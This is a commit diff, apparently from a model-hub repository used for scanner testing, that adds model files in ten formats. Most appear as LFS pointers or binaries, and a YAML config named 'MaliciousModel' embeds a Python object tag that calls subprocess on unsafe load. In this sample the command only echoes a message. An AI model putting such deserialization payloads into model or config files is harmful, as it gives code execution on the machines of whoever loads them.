test
Browse files- model_1010.gguf +0 -0
- model_1010.h5 +3 -0
- model_1010.keras +0 -0
- model_1010.nemo +0 -0
- model_1010.npy +3 -0
- model_1010.onnx +3 -0
- model_1010.pkl +3 -0
- model_1010.pt +3 -0
- model_1010.safetensors +3 -0
- model_1010.yaml +8 -0
model_1010.gguf
ADDED
|
Binary file (192 Bytes). View file
|
|
|
model_1010.h5
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:187263c2a48e0386114271490033f23a7c4390e7ee9c75f4bccee7bc0e614327
|
| 3 |
+
size 2616
|
model_1010.keras
ADDED
|
Binary file (20.8 kB). View file
|
|
|
model_1010.nemo
ADDED
|
Binary file (454 Bytes). View file
|
|
|
model_1010.npy
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:0baca677d0138bc0a4771f5a547916db9e485b799dc2433ea13705ee2e8553e9
|
| 3 |
+
size 345
|
model_1010.onnx
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:4f4d854e7c40b0b0d4f1d70aee9f4fe8ae03a8e25c619a54026c63612e2150f2
|
| 3 |
+
size 574
|
model_1010.pkl
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:69c2f54bb8e07f7ca7d935b4b1a12c792ce98a738565fc496067d92fe2f3aca7
|
| 3 |
+
size 184
|
model_1010.pt
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:9164865efb5ae67f48f44485fce6b4a43b6de3e260ccac3cf3c1c2d9f12094f3
|
| 3 |
+
size 1343
|
model_1010.safetensors
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:d758a9b685f0fd5c24c3485d3321f63f8347fab1bc12b4328c011ff7e0ed8d0b
|
| 3 |
+
size 924
|
model_1010.yaml
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
|
| 2 |
+
model:
|
| 3 |
+
name: MaliciousModel
|
| 4 |
+
layers: 3
|
| 5 |
+
activation: relu
|
| 6 |
+
payload: !!python/object/apply:subprocess.check_output
|
| 7 |
+
args: [["echo", "Malicious YAML model executed!"]]
|
| 8 |
+
kwds: {shell: false}
|